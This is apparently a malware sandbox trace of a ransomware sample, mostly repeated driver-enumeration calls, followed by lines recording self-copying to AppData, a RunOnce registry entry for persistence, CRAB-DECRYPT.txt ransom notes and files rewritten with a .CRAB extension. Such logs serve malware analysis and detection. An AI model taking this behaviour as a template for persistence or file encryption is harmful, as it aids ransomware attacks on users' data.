Driver Get Name load_address = 26812416 True 1
Fn
Driver Get Name load_address = 23240704 True 1
Fn
Driver Get Name load_address = 23277568 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 22892544 True 1
Fn
Driver Get Name load_address = 23126016 True 1
Fn
Driver Get Name load_address = 23191552 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21008384 True 1
Fn
Driver Get Name load_address = 21045248 True 1
Fn
Driver Get Name load_address = 21090304 True 1
Fn
Driver Get Name load_address = 21159936 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56893440 True 1
Fn
Driver Get Name load_address = 57176064 True 1
Fn
Driver Get Name load_address = 57212928 True 1
Fn
Driver Get Name load_address = 57368576 True 1
Fn
Driver Get Name load_address = 57430016 True 1
Fn
Driver Get Name load_address = 57540608 True 1
Fn
Driver Get Name load_address = 57622528 True 1
Fn
Driver Get Name load_address = 57954304 True 1
Fn
Driver Get Name load_address = 58003456 True 1
Fn
Driver Get Name load_address = 58048512 True 1
Fn
Driver Get Name load_address = 58109952 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 17338368 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 61476864 True 1
Fn
Driver Get Name load_address = 61624320 True 1
Fn
Driver Get Name load_address = 61693952 True 1
Fn
Driver Get Name load_address = 62193664 True 1
Fn
Driver Get Name load_address = 62283776 True 1
Fn
Driver Get Name load_address = 62349312 True 1
Fn
Driver Get Name load_address = 62439424 True 1
Fn
Driver Get Name load_address = 62586880 True 1
Fn
Driver Get Name load_address = 62636032 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 60928000 True 1
Fn
Driver Get Name load_address = 61063168 True 1
Fn
Driver Get Name load_address = 61169664 True 1
Fn
Driver Get Name load_address = 61214720 True 1
Fn
Driver Get Name load_address = 61276160 True 1
Fn
Driver Get Name load_address = 61337600 True 1
Fn
Driver Get Name load_address = 63676416 True 1
Fn
Driver Get Name load_address = 63950848 True 1
Fn
Driver Get Name load_address = 64024576 True 1
Fn
Driver Get Name load_address = 64393216 True 1
Fn
Driver Get Name load_address = 64479232 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 63164416 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63328256 True 1
Fn
Driver Get Name load_address = 63385600 True 1
Fn
Driver Get Name load_address = 63434752 True 1
Fn
Driver Get Name load_address = 63479808 True 1
Fn
Driver Get Name load_address = 131072 True 1
Fn
Driver Get Name load_address = 63557632 True 1
Fn
Driver Get Name load_address = 5046272 True 1
Fn
Driver Get Name load_address = 63606784 True 1
Fn
Driver Get Name load_address = 7667712 True 1
Fn
Driver Get Name load_address = 10223616 True 1
Fn
Driver Get Name load_address = 64856064 True 1
Fn
Driver Get Name load_address = 61345792 True 1
Fn
Driver Get Name load_address = 64913408 True 1
Fn
Driver Get Name load_address = 64950272 True 1
Fn
Driver Get Name load_address = 62828544 True 1
Fn
Driver Get Name load_address = 27009024 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 27152384 True 1
Fn
Driver Get Name load_address = 44417024 True 1
Fn
Driver Get Name load_address = 44515328 True 1
Fn
Driver Get Name load_address = 45338624 True 1
Fn
Driver Get Name load_address = 45461504 True 1
Fn
Driver Get Name load_address = 45559808 True 1
Fn
Driver Get Name load_address = 45744128 True 1
Fn
Driver Get Name load_address = 44040192 True 1
Fn
Driver Get Name load_address = 67641344 True 1
Fn
Driver Get Name load_address = 68321280 True 1
Fn
Driver Get Name load_address = 68366336 True 1
Fn
Driver Get Name load_address = 68567040 True 1
Fn
Driver Get Name load_address = 68640768 True 1
Fn
Driver Get Name load_address = 72155136 True 1
Fn
Driver Get Name load_address = 72781824 True 1
Fn
Driver Get Name load_address = 72929280 True 1
Fn
Driver Get Name load_address = 1995374592 True 1
Fn
Driver Get Name load_address = 1211957248 True 1
Fn
Driver Get Name load_address = 4280352768 True 1
Fn
Driver Enumerate load_addresses = 1638160 True 1
Fn
Driver Enumerate load_addresses = 2162688 True 1
Fn
Driver Get Name load_address = 42323968 True 1
Fn
Driver Get Name load_address = 42024960 True 1
Fn
Driver Get Name load_address = 12156928 True 1
Fn
Driver Get Name load_address = 13324288 True 1
Fn
Driver Get Name load_address = 13647872 True 1
Fn
Driver Get Name load_address = 13729792 True 1
Fn
Driver Get Name load_address = 15540224 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 15351808 True 1
Fn
Driver Get Name load_address = 16326656 True 1
Fn
Driver Get Name load_address = 16683008 True 1
Fn
Driver Get Name load_address = 16719872 True 1
Fn
Driver Get Name load_address = 14114816 True 1
Fn
Driver Get Name load_address = 15413248 True 1
Fn
Driver Get Name load_address = 14323712 True 1
Fn
Driver Get Name load_address = 14409728 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 12959744 True 1
Fn
Driver Get Name load_address = 15466496 True 1
Fn
Driver Get Name load_address = 13066240 True 1
Fn
Driver Get Name load_address = 13238272 True 1
Fn
Driver Get Name load_address = 14495744 True 1
Fn
Driver Get Name load_address = 14561280 True 1
Fn
Driver Get Name load_address = 17539072 True 1
Fn
Driver Get Name load_address = 17850368 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17932288 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18317312 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21327872 True 1
Fn
Driver Get Name load_address = 22323200 True 1
Fn
Driver Get Name load_address = 22716416 True 1
Fn
Driver Get Name load_address = 23310336 True 1
Fn
Driver Get Name load_address = 25423872 True 1
Fn
Driver Get Name load_address = 25726976 True 1
Fn
Driver Get Name load_address = 25792512 True 1
Fn
Driver Get Name load_address = 26103808 True 1
Fn
Driver Get Name load_address = 26136576 True 1
Fn
Driver Get Name load_address = 26374144 True 1
Fn
Driver Get Name load_address = 26447872 True 1
Fn
Driver Get Name load_address = 26484736 True 1
Fn
Driver Get Name load_address = 26722304 True 1
Fn
Driver Get Name load_address = 26812416 True 1
Fn
Driver Get Name load_address = 23240704 True 1
Fn
Driver Get Name load_address = 23277568 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 22892544 True 1
Fn
Driver Get Name load_address = 23126016 True 1
Fn
Driver Get Name load_address = 23191552 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21008384 True 1
Fn
Driver Get Name load_address = 21045248 True 1
Fn
Driver Get Name load_address = 21090304 True 1
Fn
Driver Get Name load_address = 21159936 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56893440 True 1
Fn
Driver Get Name load_address = 57176064 True 1
Fn
Driver Get Name load_address = 57212928 True 1
Fn
Driver Get Name load_address = 57368576 True 1
Fn
Driver Get Name load_address = 57430016 True 1
Fn
Driver Get Name load_address = 57540608 True 1
Fn
Driver Get Name load_address = 57622528 True 1
Fn
Driver Get Name load_address = 57954304 True 1
Fn
Driver Get Name load_address = 58003456 True 1
Fn
Driver Get Name load_address = 58048512 True 1
Fn
Driver Get Name load_address = 58109952 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 17338368 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 61476864 True 1
Fn
Driver Get Name load_address = 61624320 True 1
Fn
Driver Get Name load_address = 61693952 True 1
Fn
Driver Get Name load_address = 62193664 True 1
Fn
Driver Get Name load_address = 62283776 True 1
Fn
Driver Get Name load_address = 62349312 True 1
Fn
Driver Get Name load_address = 62439424 True 1
Fn
Driver Get Name load_address = 62586880 True 1
Fn
Driver Get Name load_address = 62636032 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 60928000 True 1
Fn
Driver Get Name load_address = 61063168 True 1
Fn
Driver Get Name load_address = 61169664 True 1
Fn
Driver Get Name load_address = 61214720 True 1
Fn
Driver Get Name load_address = 61276160 True 1
Fn
Driver Get Name load_address = 61337600 True 1
Fn
Driver Get Name load_address = 63676416 True 1
Fn
Driver Get Name load_address = 63950848 True 1
Fn
Driver Get Name load_address = 64024576 True 1
Fn
Driver Get Name load_address = 64393216 True 1
Fn
Driver Get Name load_address = 64479232 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 63164416 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63328256 True 1
Fn
Driver Get Name load_address = 63385600 True 1
Fn
Driver Get Name load_address = 63434752 True 1
Fn
Driver Get Name load_address = 63479808 True 1
Fn
Driver Get Name load_address = 131072 True 1
Fn
Driver Get Name load_address = 63557632 True 1
Fn
Driver Get Name load_address = 5046272 True 1
Fn
Driver Get Name load_address = 63606784 True 1
Fn
Driver Get Name load_address = 7667712 True 1
Fn
Driver Get Name load_address = 10223616 True 1
Fn
Driver Get Name load_address = 64856064 True 1
Fn
Driver Get Name load_address = 61345792 True 1
Fn
Driver Get Name load_address = 64913408 True 1
Fn
Driver Get Name load_address = 64950272 True 1
Fn
Driver Get Name load_address = 62828544 True 1
Fn
Driver Get Name load_address = 27009024 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 27152384 True 1
Fn
Driver Get Name load_address = 44417024 True 1
Fn
Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Environment Get Environment String name = AppData, result_out = C:\Users\aETAdzjz\AppData\Roaming True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Local\Temp\qwerty.exe, type = size True 1
Fn
Driver Enumerate load_addresses = 1638000 True 1
Fn
Driver Enumerate load_addresses = 3014656 True 1
Fn
Driver Get Name load_address = 42323968 True 1
Fn
Driver Get Name load_address = 42024960 True 1
Fn
Driver Get Name load_address = 12156928 True 1
Fn
Driver Get Name load_address = 13324288 True 1
Fn
Driver Get Name load_address = 13647872 True 1
Fn
Driver Get Name load_address = 13729792 True 1
Fn
Driver Get Name load_address = 15540224 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 15351808 True 1
Fn
Driver Get Name load_address = 16326656 True 1
Fn
Driver Get Name load_address = 16683008 True 1
Fn
Driver Get Name load_address = 16719872 True 1
Fn
Driver Get Name load_address = 14114816 True 1
Fn
Driver Get Name load_address = 15413248 True 1
Fn
Driver Get Name load_address = 14323712 True 1
Fn
Driver Get Name load_address = 14409728 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 12959744 True 1
Fn
Driver Get Name load_address = 15466496 True 1
Fn
Driver Get Name load_address = 13066240 True 1
Fn
Driver Get Name load_address = 13238272 True 1
Fn
Driver Get Name load_address = 14495744 True 1
Fn
Driver Get Name load_address = 14561280 True 1
Fn
Driver Get Name load_address = 17539072 True 1
Fn
Driver Get Name load_address = 17850368 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17932288 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18317312 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21327872 True 1
Fn
Driver Get Name load_address = 22323200 True 1
Fn
Driver Get Name load_address = 22716416 True 1
Fn
Driver Get Name load_address = 23310336 True 1
Fn
Driver Get Name load_address = 25423872 True 1
Fn
Driver Get Name load_address = 25726976 True 1
Fn
Driver Get Name load_address = 25792512 True 1
Fn
Driver Get Name load_address = 26103808 True 1
Fn
Driver Get Name load_address = 26136576 True 1
Fn
Driver Get Name load_address = 26374144 True 1
Fn
Driver Get Name load_address = 26447872 True 1
Fn
Driver Get Name load_address = 26484736 True 1
Fn
Driver Get Name load_address = 26722304 True 1
Fn
Driver Get Name load_address = 26812416 True 1
Fn
Driver Get Name load_address = 23240704 True 1
Fn
Driver Get Name load_address = 23277568 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 22892544 True 1
Fn
Driver Get Name load_address = 23126016 True 1
Fn
Driver Get Name load_address = 23191552 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21008384 True 1
Fn
Driver Get Name load_address = 21045248 True 1
Fn
Driver Get Name load_address = 21090304 True 1
Fn
Driver Get Name load_address = 21159936 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56893440 True 1
Fn
Driver Get Name load_address = 57176064 True 1
Fn
Driver Get Name load_address = 57212928 True 1
Fn
Driver Get Name load_address = 57368576 True 1
Fn
Driver Get Name load_address = 57430016 True 1
Fn
Driver Get Name load_address = 57540608 True 1
Fn
Driver Get Name load_address = 57622528 True 1
Fn
Driver Get Name load_address = 57954304 True 1
Fn
Driver Get Name load_address = 58003456 True 1
Fn
Driver Get Name load_address = 58048512 True 1
Fn
Driver Get Name load_address = 58109952 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 17338368 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 61476864 True 1
Fn
Driver Get Name load_address = 61624320 True 1
Fn
Driver Get Name load_address = 61693952 True 1
Fn
Driver Get Name load_address = 62193664 True 1
Fn
Driver Get Name load_address = 62283776 True 1
Fn
Driver Get Name load_address = 62349312 True 1
Fn
Driver Get Name load_address = 62439424 True 1
Fn
Driver Get Name load_address = 62586880 True 1
Fn
Driver Get Name load_address = 62636032 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 60928000 True 1
Fn
Driver Get Name load_address = 61063168 True 1
Fn
Driver Get Name load_address = 61169664 True 1
Fn
Driver Get Name load_address = 61214720 True 1
Fn
Driver Get Name load_address = 61276160 True 1
Fn
Driver Get Name load_address = 61337600 True 1
Fn
Driver Get Name load_address = 63676416 True 1
Fn
Driver Get Name load_address = 63950848 True 1
Fn
Driver Get Name load_address = 64024576 True 1
Fn
Driver Get Name load_address = 64393216 True 1
Fn
Driver Get Name load_address = 64479232 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 63164416 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63328256 True 1
Fn
Driver Get Name load_address = 63385600 True 1
Fn
Driver Get Name load_address = 63434752 True 1
Fn
Driver Get Name load_address = 63479808 True 1
Fn
Driver Get Name load_address = 131072 True 1
Fn
Driver Get Name load_address = 63557632 True 1
Fn
Driver Get Name load_address = 5046272 True 1
Fn
Driver Get Name load_address = 63606784 True 1
Fn
Driver Get Name load_address = 7667712 True 1
Fn
Driver Get Name load_address = 10223616 True 1
Fn
Driver Get Name load_address = 64856064 True 1
Fn
Driver Get Name load_address = 61345792 True 1
Fn
Driver Get Name load_address = 64913408 True 1
Fn
Driver Get Name load_address = 64950272 True 1
Fn
Driver Get Name load_address = 62828544 True 1
Fn
Driver Get Name load_address = 27009024 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 27152384 True 1
Fn
Driver Get Name load_address = 44417024 True 1
Fn
Driver Get Name load_address = 44515328 True 1
Fn
Driver Get Name load_address = 45338624 True 1
Fn
Driver Get Name load_address = 45461504 True 1
Fn
Driver Get Name load_address = 45559808 True 1
Fn
Driver Get Name load_address = 45744128 True 1
Fn
Driver Get Name load_address = 44040192 True 1
Fn
Driver Get Name load_address = 67641344 True 1
Fn
Driver Get Name load_address = 68321280 True 1
Fn
Driver Get Name load_address = 68366336 True 1
Fn
Driver Get Name load_address = 68567040 True 1
Fn
Driver Get Name load_address = 68640768 True 1
Fn
Driver Get Name load_address = 72155136 True 1
Fn
Driver Get Name load_address = 72781824 True 1
Fn
Driver Get Name load_address = 72929280 True 1
Fn
Driver Get Name load_address = 1995374592 True 1
Fn
Driver Get Name load_address = 1211957248 True 1
Fn
Driver Get Name load_address = 4280352768 True 1
Fn
Driver Enumerate load_addresses = 1638012 True 1
Fn
Driver Enumerate load_addresses = 3014656 True 1
Fn
Driver Get Name load_address = 42323968 True 1
Fn
Driver Get Name load_address = 42024960 True 1
Fn
Driver Get Name load_address = 12156928 True 1
Fn
Driver Get Name load_address = 13324288 True 1
Fn
Driver Get Name load_address = 13647872 True 1
Fn
Driver Get Name load_address = 13729792 True 1
Fn
Driver Get Name load_address = 15540224 True 1
Fn
Driver Get Name load_address = 14680064 True 1
Fn
Driver Get Name load_address = 15351808 True 1
Fn
Driver Get Name load_address = 16326656 True 1
Fn
Driver Get Name load_address = 16683008 True 1
Fn
Driver Get Name load_address = 16719872 True 1
Fn
Driver Get Name load_address = 14114816 True 1
Fn
Driver Get Name load_address = 15413248 True 1
Fn
Driver Get Name load_address = 14323712 True 1
Fn
Driver Get Name load_address = 14409728 True 1
Fn
Driver Get Name load_address = 12582912 True 1
Fn
Driver Get Name load_address = 12959744 True 1
Fn
Driver Get Name load_address = 15466496 True 1
Fn
Driver Get Name load_address = 13066240 True 1
Fn
Driver Get Name load_address = 13238272 True 1
Fn
Driver Get Name load_address = 14495744 True 1
Fn
Driver Get Name load_address = 14561280 True 1
Fn
Driver Get Name load_address = 17539072 True 1
Fn
Driver Get Name load_address = 17850368 True 1
Fn
Driver Get Name load_address = 18939904 True 1
Fn
Driver Get Name load_address = 17932288 True 1
Fn
Driver Get Name load_address = 20656128 True 1
Fn
Driver Get Name load_address = 18317312 True 1
Fn
Driver Get Name load_address = 20766720 True 1
Fn
Driver Get Name load_address = 20836352 True 1
Fn
Driver Get Name load_address = 21327872 True 1
Fn
Driver Get Name load_address = 22323200 True 1
Fn
Driver Get Name load_address = 22716416 True 1
Fn
Driver Get Name load_address = 23310336 True 1
Fn
Driver Get Name load_address = 25423872 True 1
Fn
Driver Get Name load_address = 25726976 True 1
Fn
Driver Get Name load_address = 25792512 True 1
Fn
Driver Get Name load_address = 26103808 True 1
Fn
Driver Get Name load_address = 26136576 True 1
Fn
Driver Get Name load_address = 26374144 True 1
Fn
Driver Get Name load_address = 26447872 True 1
Fn
Driver Get Name load_address = 26484736 True 1
Fn
Driver Get Name load_address = 26722304 True 1
Fn
Driver Get Name load_address = 26812416 True 1
Fn
Driver Get Name load_address = 23240704 True 1
Fn
Driver Get Name load_address = 23277568 True 1
Fn
Driver Get Name load_address = 23068672 True 1
Fn
Driver Get Name load_address = 22892544 True 1
Fn
Driver Get Name load_address = 23126016 True 1
Fn
Driver Get Name load_address = 23191552 True 1
Fn
Driver Get Name load_address = 20971520 True 1
Fn
Driver Get Name load_address = 21008384 True 1
Fn
Driver Get Name load_address = 21045248 True 1
Fn
Driver Get Name load_address = 21090304 True 1
Fn
Driver Get Name load_address = 21159936 True 1
Fn
Driver Get Name load_address = 20877312 True 1
Fn
Driver Get Name load_address = 16777216 True 1
Fn
Driver Get Name load_address = 56893440 True 1
Fn
Driver Get Name load_address = 57176064 True 1
Fn
Driver Get Name load_address = 57212928 True 1
Fn
Driver Get Name load_address = 57368576 True 1
Fn
Driver Get Name load_address = 57430016 True 1
Fn
Driver Get Name load_address = 57540608 True 1
Fn
Driver Get Name load_address = 57622528 True 1
Fn
Driver Get Name load_address = 57954304 True 1
Fn
Driver Get Name load_address = 58003456 True 1
Fn
Driver Get Name load_address = 58048512 True 1
Fn
Driver Get Name load_address = 58109952 True 1
Fn
Driver Get Name load_address = 56623104 True 1
Fn
Driver Get Name load_address = 56745984 True 1
Fn
Driver Get Name load_address = 17338368 True 1
Fn
Driver Get Name load_address = 56815616 True 1
Fn
Driver Get Name load_address = 61476864 True 1
Fn
Driver Get Name load_address = 61624320 True 1
Fn
Driver Get Name load_address = 61693952 True 1
Fn
Driver Get Name load_address = 62193664 True 1
Fn
Driver Get Name load_address = 62283776 True 1
Fn
Driver Get Name load_address = 62349312 True 1
Fn
Driver Get Name load_address = 62439424 True 1
Fn
Driver Get Name load_address = 62586880 True 1
Fn
Driver Get Name load_address = 62636032 True 1
Fn
Driver Get Name load_address = 60817408 True 1
Fn
Driver Get Name load_address = 60928000 True 1
Fn
Driver Get Name load_address = 61063168 True 1
Fn
Driver Get Name load_address = 61169664 True 1
Fn
Driver Get Name load_address = 61214720 True 1
Fn
Driver Get Name load_address = 61276160 True 1
Fn
Driver Get Name load_address = 61337600 True 1
Fn
Driver Get Name load_address = 63676416 True 1
Fn
Driver Get Name load_address = 63950848 True 1
Fn
Driver Get Name load_address = 64024576 True 1
Fn
Driver Get Name load_address = 64393216 True 1
Fn
Driver Get Name load_address = 64479232 True 1
Fn
Driver Get Name load_address = 62914560 True 1
Fn
Driver Get Name load_address = 63164416 True 1
Fn
Driver Get Name load_address = 63303680 True 1
Fn
Driver Get Name load_address = 63328256 True 1
Fn
Driver Get Name load_address = 63385600 True 1
Fn
Driver Get Name load_address = 63434752 True 1
Fn
Driver Get Name load_address = 63479808 True 1
Fn
Driver Get Name load_address = 131072 True 1
Fn
Driver Get Name load_address = 63557632 True 1
Fn
Driver Get Name load_address = 5046272 True 1
Fn
Driver Get Name load_address = 63606784 True 1
Fn
Driver Get Name load_address = 7667712 True 1
Fn
Driver Get Name load_address = 10223616 True 1
Fn
Driver Get Name load_address = 64856064 True 1
Fn
Driver Get Name load_address = 61345792 True 1
Fn
Driver Get Name load_address = 64913408 True 1
Fn
Driver Get Name load_address = 64950272 True 1
Fn
Driver Get Name load_address = 62828544 True 1
Fn
Driver Get Name load_address = 27009024 True 1
Fn
Driver Get Name load_address = 64958464 True 1
Fn
Driver Get Name load_address = 27152384 True 1
Fn
Driver Get Name load_address = 44417024 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe, size = 238601 True 1
Fn
Data
Module Unmap process_name = c:\users\aetadzjz\appdata\local\temp\qwerty.exe True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x750ddf04 True 1
Fn
Registry Create Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce True 1
Fn
Registry Write Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce, value_name = otgsjjqnaut, data = "C:\Users\aETAdzjz\AppData\Roaming\Microsoft\hojffa.exe", size = 112, type = REG_SZ True 1
Fn
Thread 0xb24
7811 0
»
Category Operation Information Success Count Logfile
File Create filename = C:\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\$Recycle.Bin\S-1-5-21-2345716840-1148442690-1481144037-1000\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\bootmgr, type = file_attributes True 1
Fn
File Move source_filename = C:\bootmgr, destination_filename = C:\bootmgr.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\bootmgr.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Move source_filename = C:\bootmgr.CRAB, destination_filename = C:\bootmgr True 1
Fn
File Create filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\PerfLogs\Admin\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Program Files (x86)\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\\CRAB-DECRYPT.txt, size = 3278 True 1
Fn
Data
File Get Info filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi, type = file_attributes True 1
Fn
File Move source_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi, destination_filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x750d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x750ddfc8 True 1
Fn
File Create filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
File Read filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Write filename = C:\Recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.CRAB, size = 1048576 True 1
Fn
Data
